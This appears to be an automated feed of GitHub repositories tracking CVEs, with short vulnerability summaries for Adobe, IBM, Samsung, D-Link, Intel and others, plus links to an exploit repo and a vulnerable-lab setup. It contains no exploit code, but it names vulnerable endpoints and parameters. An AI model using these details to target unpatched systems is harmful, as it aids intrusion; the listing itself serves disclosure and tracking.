**Adobe Bridge versions 12.0.3 (and earlier) and 13.0.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22231](https://github.com/Live-Hack-CVE/CVE-2023-22231) create time: 2023-02-17T23:22:15Z

**Adobe Bridge versions 12.0.3 (and earlier) and 13.0.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22229](https://github.com/Live-Hack-CVE/CVE-2023-22229) create time: 2023-02-17T23:22:12Z

**Adobe Bridge versions 12.0.3 (and earlier) and 13.0.1 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22228](https://github.com/Live-Hack-CVE/CVE-2023-22228) create time: 2023-02-17T23:22:08Z

**Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21578](https://github.com/Live-Hack-CVE/CVE-2023-21578) create time: 2023-02-17T23:22:05Z

**** REJECT ** DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2021-33396. Reason: This record is a duplicate of CVE-2021-33396. Notes: All CVE users should reference CVE-2021-33396 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34250](https://github.com/Live-Hack-CVE/CVE-2021-34250) create time: 2023-02-17T22:13:12Z

**Sensitive Cookie Without 'HttpOnly' Flag vulnerability in Johnson Controls System Configuration Tool (SCT) version 14 prior to 14.2.3 and version 15 prior to 15.0.3 could allow access to the cookie. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21939](https://github.com/Live-Hack-CVE/CVE-2022-21939) create time: 2023-02-17T22:13:37Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43579](https://github.com/Live-Hack-CVE/CVE-2022-43579) create time: 2023-02-17T22:13:27Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.0 could allow an authenticated user to perform unauthorized actions due to improper access controls. IBM X-Force ID: 235533. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40231](https://github.com/Live-Hack-CVE/CVE-2022-40231) create time: 2023-02-17T22:13:23Z

**IBM QRadar SIEM 7.4 and 7.5 is vulnerable to information exposure allowing a non-tenant user with a specific domain security profile assigned to see some data from other domains. IBM X-Force ID: 230402. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34351](https://github.com/Live-Hack-CVE/CVE-2022-34351) create time: 2023-02-17T22:13:20Z

**Dell PowerScale OneFS, versions 8.2.x through 9.4.x contain multiple stored cross-site scripting vulnerabilities. A remote authenticated malicious user with high privileges may potentially exploit these vulnerabilities to store malicious HTML or JavaScript code through multiple affected fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33934](https://github.com/Live-Hack-CVE/CVE-2022-33934) create time: 2023-02-17T22:13:15Z

**Dell PowerEdge BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause a denial of service during SMM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34376](https://github.com/Live-Hack-CVE/CVE-2022-34376) create time: 2023-02-17T22:13:07Z

**IBM InfoSphere Information Server 11.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 246333 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24960](https://github.com/Live-Hack-CVE/CVE-2023-24960) create time: 2023-02-17T22:13:34Z

**Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23279](https://github.com/Live-Hack-CVE/CVE-2023-23279) create time: 2023-02-17T22:13:30Z

**NetHack is a single player dungeon exploration game. Starting with version 3.6.2 and prior to version 3.6.7, illegal input to the "C" (call) command can cause a buffer overflow and crash the NetHack process. This vulnerability may be a security issue for systems that have NetHack installed suid/sgid and for shared syst CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24809](https://github.com/Live-Hack-CVE/CVE-2023-24809) create time: 2023-02-17T22:13:03Z

**The vulnerability was found Moodle which exists due to insufficient limitations on the "start page" preference. A remote attacker can set that preference for another user. The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23923](https://github.com/Live-Hack-CVE/CVE-2023-23923) create time: 2023-02-17T22:13:00Z

**The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in blog search. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website. This flaw allows a remote attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23922](https://github.com/Live-Hack-CVE/CVE-2023-23922) create time: 2023-02-17T22:12:56Z

**The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in some returnurl parameters. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website. This flaw allows a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23921](https://github.com/Live-Hack-CVE/CVE-2023-23921) create time: 2023-02-17T22:12:52Z

**A Stack-based overflow vulnerability in IpcRxEmbmsSessionList in SECRIL prior to Android S(12) allows attacker to cause memory corruptions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21451](https://github.com/Live-Hack-CVE/CVE-2023-21451) create time: 2023-02-17T22:12:49Z

**Use of Externally-Controlled Format String vulnerabilities in STST TA prior to SMR Jan-2023 Release 1 allows arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21420](https://github.com/Live-Hack-CVE/CVE-2023-21420) create time: 2023-02-17T22:12:45Z

**Improper input validation in MyFiles prior to version 12.2.09 in Android R(11), 13.1.03.501 in Android S( 12) and 14.1.00.422 in Android T(13) allows local attacker to access data of MyFiles. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21446](https://github.com/Live-Hack-CVE/CVE-2023-21446) create time: 2023-02-17T22:12:41Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSetACLFilter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24348](https://github.com/Live-Hack-CVE/CVE-2023-24348) create time: 2023-02-17T22:12:38Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSetRoute. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24349](https://github.com/Live-Hack-CVE/CVE-2023-24349) create time: 2023-02-17T22:12:35Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the webpage parameter at /goform/formWPS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24352](https://github.com/Live-Hack-CVE/CVE-2023-24352) create time: 2023-02-17T22:12:31Z

**Improper access control vulnerability in MyFiles prior to versions 12.2.09 in Android R(11), 13.1.03.501 in Android S(12) and 14.1.00.422 in Android T(13) allows local attacker to write file with MyFiles privilege via implicit intent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21445](https://github.com/Live-Hack-CVE/CVE-2023-21445) create time: 2023-02-17T22:12:28Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the config.smtp_email_subject parameter at /goform/formSetEmail. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24350](https://github.com/Live-Hack-CVE/CVE-2023-24350) create time: 2023-02-17T22:12:24Z

**An issue in MPV v.0.29.1 fixed in v0.30 allows attackers to execute arbitrary code and crash program via the ao_c parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19824](https://github.com/Live-Hack-CVE/CVE-2020-19824) create time: 2023-02-17T20:01:45Z

**File Upload Vulnerability in Yupoxion BearAdmin before commit 10176153528b0a914eb4d726e200fd506b73b075 allows attacker to execute arbitrary remote code via the Upfile function of the extend/tools/Ueditor endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35261](https://github.com/Live-Hack-CVE/CVE-2021-35261) create time: 2023-02-17T20:02:39Z

**An issue in FeMiner WMS v1.1 allows attackers to execute arbitrary code via the filename parameter and the exec function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33949](https://github.com/Live-Hack-CVE/CVE-2021-33949) create time: 2023-02-17T20:02:35Z

**An issue in ttyd v.1.6.3 allows attacker to execute arbitrary code via default configuration permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34182](https://github.com/Live-Hack-CVE/CVE-2021-34182) create time: 2023-02-17T20:02:31Z

**SQL injection vulnerability in FantasticLBP Hotels Server v1.0 allows attacker to execute arbitrary code via the username parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33948](https://github.com/Live-Hack-CVE/CVE-2021-33948) create time: 2023-02-17T20:02:28Z

**Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34164](https://github.com/Live-Hack-CVE/CVE-2021-34164) create time: 2023-02-17T20:02:24Z

**Cross Site Scripting vulnerability in YMFE yapo v1.9.1 allows attacker to execute arbitrary code via the remark parameter of the interface edit page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33237](https://github.com/Live-Hack-CVE/CVE-2021-33237) create time: 2023-02-17T20:02:21Z

**Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33226](https://github.com/Live-Hack-CVE/CVE-2021-33226) create time: 2023-02-17T20:02:17Z

**Buffer Overflow vulnerability in Dvidelabs flatcc v.0.6.0 allows local attacker to execute arbitrary code via the fltacc execution of the error_ref_sym function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33983](https://github.com/Live-Hack-CVE/CVE-2021-33983) create time: 2023-02-17T20:02:14Z

**An issue in Plone CMS v. 5.2.4, 5.2.3, 5.2.2, 5.2.1, 5.2.0, 5.1rc2, 5.1rc1, 5.1b4, 5.1b3, 5.1b2, 5.1a2, 5.1a1, 5.1.7, 5.1.6, 5.1.5, 5.1.4, 5.1.2, 5.1.1 5.1, 5.0rc3, 5.0rc2, 5.0rc1, 5.0.9, 5.0.8, 5.0.7, 5.0.6, 5.0.5, 5.0.4, 5.0.3, 5.0.2, 5.0.10, 5.0.1, 5.0, 4.3.9, 4.3.8, 4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.20, 4 allo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33926](https://github.com/Live-Hack-CVE/CVE-2021-33926) create time: 2023-02-17T20:02:09Z

**An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33391](https://github.com/Live-Hack-CVE/CVE-2021-33391) create time: 2023-02-17T20:02:04Z

**Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32142](https://github.com/Live-Hack-CVE/CVE-2021-32142) create time: 2023-02-17T20:02:01Z

**SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32441](https://github.com/Live-Hack-CVE/CVE-2021-32441) create time: 2023-02-17T20:01:58Z

**An issue in Schism Tracker v20200412 fixed in v.20200412 allows attacker to obtain sensitive information via the fmt_mtm_load_song function in fmt/mtm.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32419](https://github.com/Live-Hack-CVE/CVE-2021-32419) create time: 2023-02-17T20:01:53Z

**Authentication vulnerability in MOSN v.0.23.0 allows attacker to escalate privileges via case-sensitive JWT authorization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32163](https://github.com/Live-Hack-CVE/CVE-2021-32163) create time: 2023-02-17T20:01:49Z

**💣 Wordpress WooCommerce users dump exploit** : [and0x00/CVE-2021-32789](https://github.com/and0x00/CVE-2021-32789) create time: 2023-02-17T19:51:24Z

**Hardcoded credentials in Global Facilities Management Software (GFMS) Version 3 software distributed by Key Systems Management permits remote attackers to impact availability, confidentiality, accessibility and dependability of electronic key boxes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45766](https://github.com/Live-Hack-CVE/CVE-2022-45766) create time: 2023-02-17T20:01:41Z

**Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0777](https://github.com/Live-Hack-CVE/CVE-2023-0777) create time: 2023-02-17T20:01:37Z

**SQL Injection vulnerability in Projectworlds Online Doctor Appointment Booking System, allows attackers to gain sensitive information via the q parameter to the getuser.php endpoint. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29168](https://github.com/Live-Hack-CVE/CVE-2020-29168) create time: 2023-02-17T17:48:00Z

**CVE-2021-41773 vulnerable apache version 2.4.49 lab set-up.** : [retrymp3/apache2.4.49VulnerableLabSetup](https://github.com/retrymp3/apache2.4.49VulnerableLabSetup) create time: 2023-02-17T18:03:23Z

**Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45701](https://github.com/Live-Hack-CVE/CVE-2022-45701) create time: 2023-02-17T17:48:04Z

**IBM Aspera Faspex 4.4.1 could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47986](https://github.com/Live-Hack-CVE/CVE-2022-47986) create time: 2023-02-17T17:47:25Z

**Sensitive Cookie in HTTPS Session Without 'Secure' Attribute vulnerability in Johnson Controls System Configuration Tool (SCT) version 14 prior to 14.2.3 and version 15 prior to 15.0.3 could allow access to the cookie. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21940](https://github.com/Live-Hack-CVE/CVE-2022-21940) create time: 2023-02-17T17:47:17Z

**Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45699](https://github.com/Live-Hack-CVE/CVE-2022-45699) create time: 2023-02-17T17:47:13Z

**Cross-Site Request Forgery (CSRF) vulnerability in WpDevArt Booking calendar, Appointment Booking System plugin <= 3.2.3 versions affects plugin forms actions (create, duplicate, edit, delete). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24388](https://github.com/Live-Hack-CVE/CVE-2023-24388) create time: 2023-02-17T17:48:14Z

**An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24329](https://github.com/Live-Hack-CVE/CVE-2023-24329) create time: 2023-02-17T17:48:11Z

**Cross-Site Request Forgery (CSRF) vulnerability in HasThemes Extensions For CF7 plugin <= 2.0.8 versions leads to arbitrary plugin activation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23899](https://github.com/Live-Hack-CVE/CVE-2023-23899) create time: 2023-02-17T17:48:07Z

**Improper input validation in Bixby Vision prior to version 3.7.70.17 allows attacker to access data of Bixby Vision. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21431](https://github.com/Live-Hack-CVE/CVE-2023-21431) create time: 2023-02-17T17:47:55Z

**Improper access control vulnerability in Galaxy Store prior to version 4.5.49.8 allows local attackers to install applications from Galaxy Store. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21433](https://github.com/Live-Hack-CVE/CVE-2023-21433) create time: 2023-02-17T17:47:52Z

**Improper cryptographic implementation in Samsung Flow for Android prior to version 4.9.04 allows adjacent attackers to decrypt encrypted messages or inject commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21443](https://github.com/Live-Hack-CVE/CVE-2023-21443) create time: 2023-02-17T17:47:49Z

**Improper cryptographic implementation in Samsung Flow for PC 4.9.14.0 allows adjacent attackers to decrypt encrypted messages or inject commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21444](https://github.com/Live-Hack-CVE/CVE-2023-21444) create time: 2023-02-17T17:47:45Z

**Improper access control vulnerabilities in Samsung Cloud prior to version 5.3.0.32 allows local attackers to access information with Samsung Cloud's privilege via implicit intent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21447](https://github.com/Live-Hack-CVE/CVE-2023-21447) create time: 2023-02-17T17:47:41Z

**Path traversal vulnerability in Samsung Cloud prior to version 5.3.0.32 allows attacker to access specific png file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21448](https://github.com/Live-Hack-CVE/CVE-2023-21448) create time: 2023-02-17T17:47:38Z

**Missing Authorization vulnerability in One Hand Operation + prior to version 6.1.21 allows multi-users to access owner's widget without authorization via gesture setting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21450](https://github.com/Live-Hack-CVE/CVE-2023-21450) create time: 2023-02-17T17:47:34Z

**An issue was discovered in ESPCMS P8.21120101 after logging in to the background, there is a SQL injection vulnerability in the function node where members are added. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23007](https://github.com/Live-Hack-CVE/CVE-2023-23007) create time: 2023-02-17T17:47:29Z

**WALLIX Access Manager 3.x through 4.0.x allows a remote attacker to access sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23592](https://github.com/Live-Hack-CVE/CVE-2023-23592) create time: 2023-02-17T17:47:21Z

**The bundle management module lacks permission verification in some APIs. Successful exploitation of this vulnerability may restore the pre-installed apps that have been uninstalled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48301](https://github.com/Live-Hack-CVE/CVE-2022-48301) create time: 2023-02-17T15:37:11Z

**The SystemUI has a vulnerability in permission management. Successful exploitation of this vulnerability may cause users to receive broadcasts from malicious apps, conveying false alarm information about external storage devices. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48296](https://github.com/Live-Hack-CVE/CVE-2022-48296) create time: 2023-02-17T15:37:08Z

**The IHwAntiMalPlugin interface lacks permission verification. Successful exploitation of this vulnerability can lead to filling problems (batch installation of applications). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48295](https://github.com/Live-Hack-CVE/CVE-2022-48295) create time: 2023-02-17T15:37:00Z

**The IHwAttestationService interface has a defect in authentication. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48294](https://github.com/Live-Hack-CVE/CVE-2022-48294) create time: 2023-02-17T15:36:54Z

**SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40032](https://github.com/Live-Hack-CVE/CVE-2022-40032) create time: 2023-02-17T15:36:50Z

**Infoblox BloxOne Endpoint for Windows through 2.2.7 allows DLL injection that can result in local privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32972](https://github.com/Live-Hack-CVE/CVE-2022-32972) create time: 2023-02-17T15:36:46Z

**SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40347](https://github.com/Live-Hack-CVE/CVE-2022-40347) create time: 2023-02-17T15:36:38Z

**External Control of Critical State Data, Improper Control of Generation of Code ('Code Injection') vulnerability in YugaByte, Inc. Yugabyte DB on Windows, Linux, MacOS, iOS (DevopsBase.Java:execCommand, TableManager.Java:runCommand modules) allows API Manipulation, Privilege Abuse. This vulnerability is associated with CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0575](https://github.com/Live-Hack-CVE/CVE-2023-0575) create time: 2023-02-17T15:37:04Z

**Due to a vulnerability in the io_uring subsystem, it is possible to leak kernel memory information to the user process. timens_install calls current_is_single_threaded to determine if the current process is single-threaded, but this call does not consider io_uring's io_worker threads, thus it is possible to insert a ti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23586](https://github.com/Live-Hack-CVE/CVE-2023-23586) create time: 2023-02-17T15:36:42Z

**An improper implementation logic in Secure Folder prior to SMR Jan-2023 Release 1 allows the Secure Folder container remain unlocked under certain condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21419](https://github.com/Live-Hack-CVE/CVE-2023-21419) create time: 2023-02-17T15:36:34Z

**Improper input validation vulnerability in Galaxy Store prior to version 4.5.49.8 allows local attackers to execute JavaScript by launching a web page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21434](https://github.com/Live-Hack-CVE/CVE-2023-21434) create time: 2023-02-17T15:36:30Z

**Uncontrolled search path in some Intel(R) QAT drivers for Windows before version 1.6 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37340](https://github.com/Live-Hack-CVE/CVE-2022-37340) create time: 2023-02-17T13:23:22Z

**Protection mechanism failure in the Intel(R) Ethernet 500 Series Controller drivers for VMware before version 1.10.0.13 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36416](https://github.com/Live-Hack-CVE/CVE-2022-36416) create time: 2023-02-17T13:23:18Z

**Out-of-bounds write in firmware for some Intel(R) Ethernet Network Controllers and Adapters E810 Series before version 1.7.0.8 and some Intel(R) Ethernet 700 Series Controllers and Adapters before version 9.101 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36382](https://github.com/Live-Hack-CVE/CVE-2022-36382) create time: 2023-02-17T13:23:14Z

**NULL pointer dereference in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35883](https://github.com/Live-Hack-CVE/CVE-2022-35883) create time: 2023-02-17T13:23:10Z

**Protection mechanism failure in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36289](https://github.com/Live-Hack-CVE/CVE-2022-36289) create time: 2023-02-17T13:23:06Z

**Uncaught exception in the FCS Server software maintained by Intel before version 1.1.79.3 may allow a privileged user to potentially enable denial of service via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36287](https://github.com/Live-Hack-CVE/CVE-2022-36287) create time: 2023-02-17T13:23:03Z

**Out-of-bounds read in the Intel(R) Media SDK software before version 22.2.2 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34346](https://github.com/Live-Hack-CVE/CVE-2022-34346) create time: 2023-02-17T13:22:59Z

**Improper authentication in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33946](https://github.com/Live-Hack-CVE/CVE-2022-33946) create time: 2023-02-17T13:22:56Z

**Improper input validation in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33190](https://github.com/Live-Hack-CVE/CVE-2022-33190) create time: 2023-02-17T13:22:53Z

**Improper access control in the Intel(R) SUR software before version 2.4.8902 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31476](https://github.com/Live-Hack-CVE/CVE-2022-31476) create time: 2023-02-17T13:22:49Z

**Out of bounds read in firmware for OpenBMC in some Intel(R) platforms before version 0.72 may allow unauthenticated user to potentially enable denial of service via network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35729](https://github.com/Live-Hack-CVE/CVE-2022-35729) create time: 2023-02-17T13:22:45Z

**Improper input validation in firmware for OpenBMC in some Intel(R) platforms before versions egs-0.91-179 and bhs-04-45 may allow an authenticated user to potentially enable denial of service via network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29494](https://github.com/Live-Hack-CVE/CVE-2022-29494) create time: 2023-02-17T13:22:41Z

**Improper access control in the Crypto API Toolkit for Intel(R) SGX before version 2.0 commit ID 91ee496 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21163](https://github.com/Live-Hack-CVE/CVE-2022-21163) create time: 2023-02-17T13:22:38Z

**Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24078](https://github.com/Live-Hack-CVE/CVE-2023-24078) create time: 2023-02-17T12:15:58Z

**LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/DeptMapper.xml. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24221](https://github.com/Live-Hack-CVE/CVE-2023-24221) create time: 2023-02-17T12:15:55Z

**LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24220](https://github.com/Live-Hack-CVE/CVE-2023-24220) create time: 2023-02-17T12:15:51Z

**LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/UserMapper.xml. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24219](https://github.com/Live-Hack-CVE/CVE-2023-24219) create time: 2023-02-17T12:15:48Z

**Dell Secure Connect Gateway (SCG) version 5.14.00.12 contains a broken cryptographic algorithm vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by performing MitM attacks and let attackers obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23695](https://github.com/Live-Hack-CVE/CVE-2023-23695) create time: 2023-02-17T12:15:44Z

**A vulnerability was found in phjounin TFTPD64-SE 4.64 and classified as critical. This issue affects some unknown processing of the file tftpd64_svc.exe. The manipulation leads to unquoted search path. An attack has to be approached locally. The associated identifier of this vulnerability is VDB-221351. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0887](https://github.com/Live-Hack-CVE/CVE-2023-0887) create time: 2023-02-17T12:15:41Z

**A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file /php-opos/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0883](https://github.com/Live-Hack-CVE/CVE-2023-0883) create time: 2023-02-17T12:15:37Z

**Improper Input Validation, Authorization Bypass Through User-Controlled Key vulnerability in Kron Tech Single Connect on Windows allows Privilege Abuse.This issue affects Single Connect: 2.16. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0882](https://github.com/Live-Hack-CVE/CVE-2023-0882) create time: 2023-02-17T12:15:34Z

**no description** : [LycsHub/CVE-2018-18893](https://github.com/LycsHub/CVE-2018-18893) create time: 2023-02-17T09:48:14Z

**no description** : [LycsHub/CVE-2020-5245](https://github.com/LycsHub/CVE-2020-5245) create time: 2023-02-17T09:55:45Z

**A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE16(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25009](https://github.com/Live-Hack-CVE/CVE-2018-25009) create time: 2023-02-17T06:45:45Z

